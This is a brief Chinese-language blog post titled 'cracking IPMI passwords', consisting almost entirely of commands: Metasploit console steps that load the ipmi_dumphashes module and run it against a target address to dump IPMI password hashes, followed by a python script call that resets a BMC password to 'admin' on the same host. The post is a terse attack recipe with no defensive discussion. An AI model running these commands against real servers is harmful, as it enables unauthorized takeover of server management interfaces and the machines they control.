【Hardware】破解 IPMI 密码

Posted by 西维蜀黍 on 2023-08-20, Last Modified on 2023-08-23

Via metasploit

# brew install metasploit

$ msfconsole

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > show options
    ... show and set options ...
msf auxiliary(ipmi_dumphashes) > set RHOSTS ip-range
msf auxiliary(ipmi_dumphashes) > set RHOSTS 192.168.18.30
msf auxiliary(ipmi_dumphashes) > exploit

reset_bmc_password_to_admin

python3 reset_bmc_password_to_admin.py input_file.txt 192.168.18.30 192.168.18.30

Reference